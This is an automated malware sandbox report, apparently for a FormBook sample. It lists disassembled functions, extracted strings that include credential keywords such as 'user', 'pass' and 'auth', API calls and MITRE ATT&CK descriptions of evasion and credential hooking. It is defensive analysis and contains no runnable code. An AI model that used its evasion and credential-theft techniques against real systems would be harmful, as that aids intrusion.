Opcode Fuzzy Hash: 451ecfdc7a6dd194cc49c0618832622829ee31958d951160e0d103bd60c3dca9
Instruction Fuzzy Hash: E831703011AB088FC784EF298495B9AB7E1FBE8340F90062DA48ACB355DF30E9058756

Function 100718C2 Relevance: 5.1, Strings: 4, Instructions: 100COMMON

Download Yara Rule

Strings

User-Agent: , xrefs: 10071935, 10071948
nt: , xrefs: 1007191E
on.d, xrefs: 10071902
urlmon.dll, xrefs: 10071959

Memory Dump Source

Source File: 0000000A.00000002.3332650981.0000000010000000.00000040.00000001.00040000.00000000.sdmp, Offset: 10000000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_10000000_explorer.jbxd

Similarity

API ID:
String ID: User-Agent: $nt: $on.d$urlmon.dll
API String ID: 0-319646191
Opcode ID: fab8d4f3d63e7cb3a61fc22749300fb1f1c56e9464b264e147718cbb7a7b3fb5
Instruction ID: c8bed6cc8a01af645d30a0bff2f58ff171e821b543fbf3602ab3282a1fea6628
Opcode Fuzzy Hash: fab8d4f3d63e7cb3a61fc22749300fb1f1c56e9464b264e147718cbb7a7b3fb5
Instruction Fuzzy Hash: 0131D131614A4C8BCB55EFA8C8857EEB7F1FF58204F40422AE48ED7241DF789A49C789

Function 106DF8C2 Relevance: 5.1, Strings: 4, Instructions: 100COMMON

Download Yara Rule

Strings

User-Agent: , xrefs: 106DF935, 106DF948
nt: , xrefs: 106DF91E
on.d, xrefs: 106DF902
urlmon.dll, xrefs: 106DF959

Memory Dump Source

Source File: 0000000A.00000002.3332775916.0000000010620000.00000040.80000000.00040000.00000000.sdmp, Offset: 10620000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_10620000_explorer.jbxd

Similarity

API ID:
String ID: User-Agent: $nt: $on.d$urlmon.dll
API String ID: 0-319646191
Opcode ID: fab8d4f3d63e7cb3a61fc22749300fb1f1c56e9464b264e147718cbb7a7b3fb5
Instruction ID: b89ee9aca92553ad2f299fb62562657dc40b9820b9ee75df8f9e74732188090a
Opcode Fuzzy Hash: fab8d4f3d63e7cb3a61fc22749300fb1f1c56e9464b264e147718cbb7a7b3fb5
Instruction Fuzzy Hash: 3F31D131615B1C8FCB84EFA9C8857EEB7E1FF58244F40022AE45ED7240EE749A45C789

Function 100718BE Relevance: 5.1, Strings: 4, Instructions: 94COMMON

Download Yara Rule

Strings

User-Agent: , xrefs: 10071935, 10071948
nt: , xrefs: 1007191E
on.d, xrefs: 10071902
urlmon.dll, xrefs: 10071959

Memory Dump Source

Source File: 0000000A.00000002.3332650981.0000000010000000.00000040.00000001.00040000.00000000.sdmp, Offset: 10000000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_10000000_explorer.jbxd

Similarity

API ID:
String ID: User-Agent: $nt: $on.d$urlmon.dll
API String ID: 0-319646191
Opcode ID: 89ed80dc1d123a3fdb33b1283e784163d7980008e053a39b7e2b7c015d122c3c
Instruction ID: 42f9dbb7583c9385408046aa8dc7f99f4044a56365bb5d88bab2a8e89093806c
Opcode Fuzzy Hash: 89ed80dc1d123a3fdb33b1283e784163d7980008e053a39b7e2b7c015d122c3c
Instruction Fuzzy Hash: B521E470614A4C8BCB45EFA8C8957EDBBF1FF58244F40822AE49AD7241DF789A05C78D

Function 106DF8BE Relevance: 5.1, Strings: 4, Instructions: 94COMMON

Download Yara Rule

Strings

User-Agent: , xrefs: 106DF935, 106DF948
nt: , xrefs: 106DF91E
on.d, xrefs: 106DF902
urlmon.dll, xrefs: 106DF959

Memory Dump Source

Source File: 0000000A.00000002.3332775916.0000000010620000.00000040.80000000.00040000.00000000.sdmp, Offset: 10620000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_10620000_explorer.jbxd

Similarity

API ID:
String ID: User-Agent: $nt: $on.d$urlmon.dll
API String ID: 0-319646191
Opcode ID: 89ed80dc1d123a3fdb33b1283e784163d7980008e053a39b7e2b7c015d122c3c
Instruction ID: e711695203429cfaec74d87348ae50bb5b4b62330913bf5d62bb5a89f489602f
Opcode Fuzzy Hash: 89ed80dc1d123a3fdb33b1283e784163d7980008e053a39b7e2b7c015d122c3c
Instruction Fuzzy Hash: E521F570A11B1C8FCB84DFA9C8857EE7BE0FF58244F40421AE45AD7240EF749A05C789

Function 10072E94 Relevance: 5.1, Strings: 4, Instructions: 87COMMON

Download Yara Rule

Strings

t, xrefs: 10072EF4
l, xrefs: 10072F03
l, xrefs: 10072F26
., xrefs: 10072F1F

Memory Dump Source

Source File: 0000000A.00000002.3332650981.0000000010000000.00000040.00000001.00040000.00000000.sdmp, Offset: 10000000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_10000000_explorer.jbxd

Similarity

API ID:
String ID: .$l$l$t
API String ID: 0-168566397
Opcode ID: 4d2417001e92a941b72e22f5172d980f9cfaeeee068a4ce0a3e94531502ff258
Instruction ID: 44c773ac84d2f151f4863e3de26973efd854a6ee6ef4e01d2534b8365ee5fed7
Opcode Fuzzy Hash: 4d2417001e92a941b72e22f5172d980f9cfaeeee068a4ce0a3e94531502ff258
Instruction Fuzzy Hash: 58218D74A24A0D9BDB48EFA8C0457EDBBF0FF18300F50862EE049D3601DB78A6518B88

Function 10072E92 Relevance: 5.1, Strings: 4, Instructions: 87COMMON

Download Yara Rule

Strings

t, xrefs: 10072EF4
l, xrefs: 10072F03
l, xrefs: 10072F26
., xrefs: 10072F1F

Memory Dump Source

Source File: 0000000A.00000002.3332650981.0000000010000000.00000040.00000001.00040000.00000000.sdmp, Offset: 10000000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_10000000_explorer.jbxd

Similarity

API ID:
String ID: .$l$l$t
API String ID: 0-168566397
Opcode ID: bb135833945c650cdd1fe89d13a3bf36b2a9c2ee8a1cabd4608026fce5a35201
Instruction ID: c4a886b01e774e11dd09639ce6c0557904e208f38eb0cc19f92b9f463bf5b2e8
Opcode Fuzzy Hash: bb135833945c650cdd1fe89d13a3bf36b2a9c2ee8a1cabd4608026fce5a35201
Instruction Fuzzy Hash: 38217E74A14A0D9FDB44EFA8C0447ADBBF0FF58300F50862EE049D3601DB78A6518B88

Function 106E0E94 Relevance: 5.1, Strings: 4, Instructions: 87COMMON

Download Yara Rule

Strings

l, xrefs: 106E0F26
t, xrefs: 106E0EF4
l, xrefs: 106E0F03
., xrefs: 106E0F1F

Memory Dump Source

Source File: 0000000A.00000002.3332775916.0000000010620000.00000040.80000000.00040000.00000000.sdmp, Offset: 10620000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_10620000_explorer.jbxd

Similarity

API ID:
String ID: .$l$l$t
API String ID: 0-168566397
Opcode ID: 4d2417001e92a941b72e22f5172d980f9cfaeeee068a4ce0a3e94531502ff258
Instruction ID: 67c4b3ace85027d63f86a045cf4107f2d6ab23fb22e0f37a5f634419ab57c243
Opcode Fuzzy Hash: 4d2417001e92a941b72e22f5172d980f9cfaeeee068a4ce0a3e94531502ff258
Instruction Fuzzy Hash: 2C218D74A25B0D9BDB44EFA8C4457EDBBF1FF18304F50462DE009E3600DB74A5518B88

Function 106E0E92 Relevance: 5.1, Strings: 4, Instructions: 87COMMON

Download Yara Rule

Strings

l, xrefs: 106E0F26
t, xrefs: 106E0EF4
l, xrefs: 106E0F03
., xrefs: 106E0F1F

Memory Dump Source

Source File: 0000000A.00000002.3332775916.0000000010620000.00000040.80000000.00040000.00000000.sdmp, Offset: 10620000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_10620000_explorer.jbxd

Similarity

API ID:
String ID: .$l$l$t
API String ID: 0-168566397
Opcode ID: bb135833945c650cdd1fe89d13a3bf36b2a9c2ee8a1cabd4608026fce5a35201
Instruction ID: b44d8b949d10a07257999d728fa4a64b79836aa5c40126eacf5d1db5858a2b48
Opcode Fuzzy Hash: bb135833945c650cdd1fe89d13a3bf36b2a9c2ee8a1cabd4608026fce5a35201
Instruction Fuzzy Hash: 59217C74A25B0D9BDB84EFA9C4457AEBAF1FF58304F50462EE009E3600DB74A5918B88

Function 10072FF2 Relevance: 5.1, Strings: 4, Instructions: 77COMMON

Download Yara Rule

Strings

pass, xrefs: 10073022
logi, xrefs: 1007303C
user, xrefs: 10073015
auth, xrefs: 1007302F

Memory Dump Source

Source File: 0000000A.00000002.3332650981.0000000010000000.00000040.00000001.00040000.00000000.sdmp, Offset: 10000000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_10000000_explorer.jbxd

Similarity

API ID:
String ID: auth$logi$pass$user
API String ID: 0-2393853802
Opcode ID: b1bb37e765f9f4b099c2fa6e409a2bcd00c7a79030895f352d0fc3307f2d087a
Instruction ID: 2d6995a1cd0bbbd5c2fe8ebab875829fa501f4194aa141cd4b2884cc508c4af8
Opcode Fuzzy Hash: b1bb37e765f9f4b099c2fa6e409a2bcd00c7a79030895f352d0fc3307f2d087a
Instruction Fuzzy Hash: BD21F030614B0D8BCB01CF9D88916DEB7E1EF88340F009619E44ADB206D7B4E9118BC6

Function 106E0FF2 Relevance: 5.1, Strings: 4, Instructions: 77COMMON

Download Yara Rule

Strings

pass, xrefs: 106E1022
auth, xrefs: 106E102F
user, xrefs: 106E1015
logi, xrefs: 106E103C

Memory Dump Source

Source File: 0000000A.00000002.3332775916.0000000010620000.00000040.80000000.00040000.00000000.sdmp, Offset: 10620000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_10620000_explorer.jbxd

Similarity

API ID:
String ID: auth$logi$pass$user
API String ID: 0-2393853802
Opcode ID: b1bb37e765f9f4b099c2fa6e409a2bcd00c7a79030895f352d0fc3307f2d087a
Instruction ID: f71e8e669e2b74880ed3b4ee5cf57866bb54d5b9c4e53beb6c2fef047a15ea4b
Opcode Fuzzy Hash: b1bb37e765f9f4b099c2fa6e409a2bcd00c7a79030895f352d0fc3307f2d087a
Instruction Fuzzy Hash: 5C21CD30615B4D8BCB45CF9A98816DEB7F1EF88384F014619E40AEB244DBB0E9548BC6

Analysis Process: NFOLsr.exePID: 4996, Parent PID: 1064COMMON

Execution Graph

Execution Coverage:	11.7%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	70
Total number of Limit Nodes:	10

Executed Functions

Function 05815F77 Relevance: 6.1, APIs: 4, Instructions: 129
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcess.KERNEL32 ref: 05815FF6
GetCurrentThread.KERNEL32 ref: 05816033
GetCurrentProcess.KERNEL32 ref: 05816070
GetCurrentThreadId.KERNEL32 ref: 058160C9

Memory Dump Source

Source File: 0000000B.00000002.2250828448.0000000005810000.00000040.00000800.00020000.00000000.sdmp, Offset: 05810000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_5810000_NFOLsr.jbxd

Similarity

API ID: Current$ProcessThread
String ID:
API String ID: 2063062207-0
Opcode ID: f73dd117ffa93d5fc943474e6854728048a6ef423fb3494a0ead4b22e0f7a768
Instruction ID: d1d17b4f87e05f093925db5c322b5a6fa1b27e38f17d55892f68a1fc7018499e
Opcode Fuzzy Hash: f73dd117ffa93d5fc943474e6854728048a6ef423fb3494a0ead4b22e0f7a768
Instruction Fuzzy Hash: B65155B090034ACFDB14CFAAD548B9EBBF5FF88314F208459E909A7360DB745844CB66

Function 05815F78 Relevance: 6.1, APIs: 4, Instructions: 128
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcess.KERNEL32 ref: 05815FF6
GetCurrentThread.KERNEL32 ref: 05816033
GetCurrentProcess.KERNEL32 ref: 05816070
GetCurrentThreadId.KERNEL32 ref: 058160C9

Memory Dump Source

Source File: 0000000B.00000002.2250828448.0000000005810000.00000040.00000800.00020000.00000000.sdmp, Offset: 05810000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_5810000_NFOLsr.jbxd

Similarity

API ID: Current$ProcessThread
String ID:
API String ID: 2063062207-0
Opcode ID: e36cf82c17c2b6a221005dc08c8bbba1f0cffb0a2ce0878fd744d9b84a6ac6f0
Instruction ID: 6e8939351961297787211203958a7548d816051d759f3ebc6d83a58816221e66
Opcode Fuzzy Hash: e36cf82c17c2b6a221005dc08c8bbba1f0cffb0a2ce0878fd744d9b84a6ac6f0
Instruction Fuzzy Hash: 185154B090034ACFDB14CFAAD548B9EBBF5FF88314F208459E909A7360DB749844CB66

Function 0581A8AB Relevance: 1.7, APIs: 1, Instructions: 183
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 0581AA71

Memory Dump Source

Source File: 0000000B.00000002.2250828448.0000000005810000.00000040.00000800.00020000.00000000.sdmp, Offset: 05810000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_5810000_NFOLsr.jbxd

Similarity

API ID: CreateWindow
String ID:
API String ID: 716092398-0
Opcode ID: 7194f40d38fe96a73dc5c8ef5d8d2a1d6b84e96ac407da68ae52bdd39ac9e358
Instruction ID: 93fea3d7b7c7182d2fc66f6e9032427d68330d53efa343f021f63e1057a8797f
Opcode Fuzzy Hash: 7194f40d38fe96a73dc5c8ef5d8d2a1d6b84e96ac407da68ae52bdd39ac9e358
Instruction Fuzzy Hash: E17189B4D01218DFDF24CFA9D984ADEBBB1BF09304F1091AAE918A7211D770AA85CF54

Function 058161BF Relevance: 1.6, APIs: 1, Instructions: 109
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0581628B

Memory Dump Source

Source File: 0000000B.00000002.2250828448.0000000005810000.00000040.00000800.00020000.00000000.sdmp, Offset: 05810000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_5810000_NFOLsr.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: 7605eec8bd133834681ff8b355fe0028111c22176e7d3356bf9752e6904198c1
Instruction ID: e8eff3dfb332ac225a3c54235c5109295bc9d9552acc6e8d963d384b1c08b355
Opcode Fuzzy Hash: 7605eec8bd133834681ff8b355fe0028111c22176e7d3356bf9752e6904198c1
Instruction Fuzzy Hash: 0E4156B9D002589FCF10CFAAD984ADEBBF5BB09310F14906AE918AB210D375A955CF54

Function 058161C0 Relevance: 1.6, APIs: 1, Instructions: 108
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0581628B

Memory Dump Source

Source File: 0000000B.00000002.2250828448.0000000005810000.00000040.00000800.00020000.00000000.sdmp, Offset: 05810000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_5810000_NFOLsr.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: f3ba994d80b138ca3f51882d77b36df2b3914a199a16921a0418398954a545ae
Instruction ID: 67f822fb98624ed536f186fb661397a82b6ca6754f99b3dda84e8eb74c9573b4
Opcode Fuzzy Hash: f3ba994d80b138ca3f51882d77b36df2b3914a199a16921a0418398954a545ae
Instruction Fuzzy Hash: EF4155B9D002589FCF00CFAAD984ADEBBF5BB09310F24906AE918AB210D375A955CF54

Function 058135B8 Relevance: 1.6, APIs: 1, Instructions: 97
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryExW.KERNELBASE(?,?,?), ref: 0581413A

Memory Dump Source

Source File: 0000000B.00000002.2250828448.0000000005810000.00000040.00000800.00020000.00000000.sdmp, Offset: 05810000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_5810000_NFOLsr.jbxd

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: e598c3f138d202570abd518c26ca40a62fbfe41de8dc6b954ac02b25ed060607
Instruction ID: 3196a6ac15bf1b8a162b96cbc7bd1d0b84afdbe09c7263a9b0bfeb101597ab93
Opcode Fuzzy Hash: e598c3f138d202570abd518c26ca40a62fbfe41de8dc6b954ac02b25ed060607
Instruction Fuzzy Hash: 064186B5D042589FCF10CFAAD884A9EFBF5BB49314F14902AE918B7320D374A945CF58

Function 05819724 Relevance: 1.6, APIs: 1, Instructions: 97
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CallWindowProcW.USER32(?,?,?,?,?), ref: 0581D0E1

Memory Dump Source

Source File: 0000000B.00000002.2250828448.0000000005810000.00000040.00000800.00020000.00000000.sdmp, Offset: 05810000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_5810000_NFOLsr.jbxd

Similarity

API ID: CallProcWindow
String ID:
API String ID: 2714655100-0
Opcode ID: d8a899ddf5f5e161641ba8c7c2e798fd6049fdee9bee6fc1314b4334108aebf5
Instruction ID: c441ca0d431f372372e092eab1205f2ef92d50766f1b172fcf59f3f14d44c5f3
Opcode Fuzzy Hash: d8a899ddf5f5e161641ba8c7c2e798fd6049fdee9bee6fc1314b4334108aebf5
Instruction Fuzzy Hash: 314108B5900309CFDB14DF99C488BAABBFAFB88314F24C459D919A7321D775A841CFA4

Function 0581408B Relevance: 1.6, APIs: 1, Instructions: 95
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryExW.KERNELBASE(?,?,?), ref: 0581413A

Memory Dump Source

Source File: 0000000B.00000002.2250828448.0000000005810000.00000040.00000800.00020000.00000000.sdmp, Offset: 05810000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_5810000_NFOLsr.jbxd

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: c91f39f057cb55e096086a537faab433eea2fe246828c7e4bd9e12e7e7e327ae
Instruction ID: 6926da46fbe6526bd50a535528128addd9208e4b4b2fe5b4d1e32c8b1e5629a7
Opcode Fuzzy Hash: c91f39f057cb55e096086a537faab433eea2fe246828c7e4bd9e12e7e7e327ae
Instruction Fuzzy Hash: 794196B5D002589FCF14CFAAD884A9EFBF5BB49314F14902AE918B7320D374A945CF58

Function 05813D80 Relevance: 1.6, APIs: 1, Instructions: 76
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleW.KERNELBASE(?), ref: 05813E12

Memory Dump Source

Source File: 0000000B.00000002.2250828448.0000000005810000.00000040.00000800.00020000.00000000.sdmp, Offset: 05810000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_5810000_NFOLsr.jbxd

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: 82678ac3c4029e1e06f3e6e46351cd889f342fa58f8b7c556b0224d99ab784b9
Instruction ID: d69843d06b24c36ce29314f46ef9b5ef59fb492084f59f4db54caa85fa8b616f
Opcode Fuzzy Hash: 82678ac3c4029e1e06f3e6e46351cd889f342fa58f8b7c556b0224d99ab784b9
Instruction Fuzzy Hash: 2C31B7B4D00209DFCB14CFAAD984ADEFBF5AB48314F14906AE918B7320D774A945CF68

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically may require being a member of an admin or otherwise privileged group on the remote system.
Tactics:	Execution, Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, Container: Container Creation, File: File Creation, File: File Modification, Process: Process Creation, Scheduled Job: Scheduled Job Creation
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute malicious payloads via loading shared modules. Shared modules are executable files that are loaded into processes to provide access to reusable code, such as specific custom functions or invoking OS API functions (i.e., Native API ).
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use rootkits to hide the presence of programs, files, network connections, services, drivers, and other system components. Rootkits are programs that hide the existence of malware by intercepting/hooking and modifying operating system API calls that supply system information.
Tactics:	Defense Evasion
Data Sources:	Drive: Drive Modification, File: File Modification, Firmware: Firmware Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify file time attributes to hide new or changes to existing files. Timestomping is a technique that modifies the timestamps of a file (the modify, access, create, and change times), often to mimic files that are in the same folder. This is done, for example, on files that have been modified or created by the adversary so that they do not appear conspicuous to forensic investigators or file analysis tools.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata, File: File Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may hook into Windows application programming interface (API) functions to collect user credentials. Malicious hooking mechanisms may capture API calls that include parameters that reveal user authentication credentials.Unlike Keylogging , this technique focuses specifically on API functions that include parameters that reveal user credentials. Hooking involves redirecting calls to these functions and can be implemented via:
Tactics:	Collection, Credential Access
Data Sources:	Process: OS API Execution, Process: Process Metadata
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report order-payment094093.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: FormBook

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Persistence and Installation Behavior

Snort Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Software Vulnerabilities

Networking

E-Banking Fraud

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\NFOLsr.exe.log

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\order-payment094093.exe.log

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

